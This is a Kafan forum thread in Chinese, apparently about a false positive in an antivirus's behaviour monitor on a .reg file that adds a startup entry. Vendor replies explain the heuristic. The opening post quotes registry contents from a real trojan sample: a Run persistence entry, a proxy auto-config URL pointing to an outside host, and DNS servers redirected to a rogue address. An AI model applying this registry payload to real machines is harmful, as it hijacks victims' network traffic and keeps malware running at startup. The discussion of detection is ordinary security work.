收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 国内杀毒软件 主防的“神奇”误报
返回列表 发新帖
查看: 2708|回复: 8
收起左侧

[智量] 主防的“神奇”误报

[复制链接]
swizzer
发表于 2020-10-15 23:38:54 | 显示全部楼层 |阅读模式
本帖最后由 swizzer 于 2020-10-15 23:42 编辑
  1. Windows Registry Editor Version 5.00

  3. [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  4. "dk"="C:\\Program File\\alllh\\au.exe"
复制代码



把这一段文本保存为reg后双击,智量主防识别为WIBD:HEUR.Trojan.KA;
若把其中把File改为Files则不报?
@智量官方


相关截图:


难道模型该调整了?




------------------------------------

本reg的最初面貌:(来自@落华无痕 提供的sf白加黑木马)
  1. Windows Registry Editor Version 5.00

  3. [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
  4. "DX报错服务"="D:\\$aa\\allilh\\allilhzu.exe"

  6. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
  7. "IE5_UA_Backup_Flag"="5.0"
  8. "User Agent"="Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
  9. "EmailName"="User@"
  10. "PrivDiscUiShown"=dword:00000001
  11. "EnableHttp1_1"=dword:00000001
  12. "WarnOnIntranet"=dword:00000001
  13. "MimeExclusionListForCache"="multipart/mixed multipart/x-mixed-replace multipart/x-byteranges "
  14. "AutoConfigProxy"="wininet.dll"
  15. "UseSchannelDirectly"=hex:01,00,00,00
  16. "DisableCachingOfSSLPages"=dword:00000000
  17. "WarnonZoneCrossing"=dword:00000000
  18. "CertificateRevocation"=dword:00000001
  19. "WarnOnPost"=hex:01,00,00,00
  20. "UrlEncoding"=dword:00000000
  21. "SecureProtocols"=dword:00000a80
  22. "PrivacyAdvanced"=dword:00000000
  23. "EnableNegotiate"=dword:00000001
  24. "MigrateProxy"=dword:00000001
  25. "ProxyEnable"=dword:00000000
  26. "AutoConfigURL"="http://hetiancheng.sn.cn:777/"

  28. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]

  30. "DefaultConnectionSettings"=hex:46,00,00,00,08,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,22,00,00,00,68,74,74,70,3A,2F,2F,68,65,74,69,61,6E,63,68,65,6E,67,2E,73,6E,2E,63,6E,3A,37,37,37,2F,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00

  32. "SavedLegacySettings"=hex:46,00,00,00,0e,00,00,00,05,00,00,00,00,00,00,00,00,00,00,00,22,00,00,00,68,74,74,70,3A,2F,2F,68,65,74,69,61,6E,63,68,65,6E,67,2E,73,6E,2E,63,6E,3A,37,37,37,2F,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00


  35. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6142CFD7-29A4-45B8-B72F-ACF97FB71AF5}]
  36. "NameServer"="119.28.117.205,114.114.114.114"
  37. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{622CA10C-0B29-46A7-BE8A-420CE93BD16B}]
  38. "NameServer"="119.28.117.205,114.114.114.114"
  39. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}]
  40. "NameServer"="119.28.117.205,114.114.114.114"
  41. [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE7A2601-0D55-40CF-B70E-405485F7E1CC}]
  42. "NameServer"="119.28.117.205,114.114.114.114"
复制代码




回复

举报

智量官方
发表于 2020-10-16 10:27:25 | 显示全部楼层
因为系统本身并不存在Program File这个目录,明显是伪造的, 所以很容易就达到主防报毒阙值
而Program Files这个目录是真实存在的用于安装软件,并且往这个目录写入文件是需要管理员权限的,所以主防阙值会高一些。
回复

举报

swizzer
 楼主| 发表于 2020-10-16 22:21:01 | 显示全部楼层
本帖最后由 swizzer 于 2020-10-16 23:15 编辑
智量官方 发表于 2020-10-16 10:27
因为系统本身并不存在Program File这个目录,明显是伪造的, 所以很容易就达到主防报毒阙值
而Program File ...

嗯,这一点我是清楚的。

不过在我这里,那个文件夹就算不是Program File(也就是官人所说的有伪造嫌疑的名称),而是其他名称,比如$aa(就像原来reg文件的那样,这算正常名称吧),主防同样报毒哦~

我只是在帖子里借一个略显极端的例子说明一下主防的阈值是多么“微妙”

换句话说,这样的主防阈值未免也太高了···对绿化软件很可能造成误杀的

况且真就靠这样的注册表内容就判为恶意也略显武断,不是吗?
------------------------------------------------------------------
另外,主防似乎还会在OllyDbg进行“attach”操作时将其识别为WIBD:HEUR.Injector.E···从用户界面多次上报也无用···不知官方那里有无此情况

@智量官方

回复

举报

αdmin
头像被屏蔽
发表于 2020-10-17 16:06:00 | 显示全部楼层
swizzer 发表于 2020-10-16 22:21
嗯,这一点我是清楚的。

不过在我这里,那个文件夹就算不是Program File(也就是官人所说的有伪造嫌疑 ...

因为注入了其它程序呗
回复

举报

智量官方
发表于 2020-10-17 17:45:43 | 显示全部楼层
swizzer 发表于 2020-10-16 22:21
嗯,这一点我是清楚的。

不过在我这里,那个文件夹就算不是Program File(也就是官人所说的有伪造嫌疑 ...

1. 绿化软件是很少会这样添加启动项目的哦,这个东西看起来有些武断。但是从我们观察的情况看,基本没有正规软件使用这种方法添加自启动.

2. Ollydbg调试的时候会注入被调试程序,我们一般用OllyIce还没观察到这种情况,麻烦将你的Ollydbg压缩后发到virus@wisevector.com 我们分析无毒后会加白,谢谢.
回复

举报

computero
头像被屏蔽
发表于 2020-10-17 18:01:20 | 显示全部楼层
智量官方 发表于 2020-10-17 17:45
1. 绿化软件是很少会这样添加启动项目的哦,这个东西看起来有些武断。但是从我们观察的情况看,基本没有 ...

WIN7系统玩腾讯的御龙在天也会报毒,醉了,你们自己测试吧
回复

举报

智量官方
发表于 2020-10-18 19:03:21 | 显示全部楼层
computero 发表于 2020-10-17 18:01
WIN7系统玩腾讯的御龙在天也会报毒,醉了,你们自己测试吧

你好,请问是否能提供智量日志?是静态扫描还是主防报毒?
回复

举报

computero
头像被屏蔽
发表于 2020-10-18 22:07:12 | 显示全部楼层
智量官方 发表于 2020-10-18 19:03
你好,请问是否能提供智量日志?是静态扫描还是主防报毒?

自己用WIN7下载一个御龙在天就知道了
回复

举报

1003305532
发表于 2020-10-23 15:17:01 | 显示全部楼层
computero 发表于 2020-10-18 22:07
自己用WIN7下载一个御龙在天就知道了

6.88G的文件 你把被报毒的文件发上来吧
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-23 10:18 , Processed in 0.132382 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表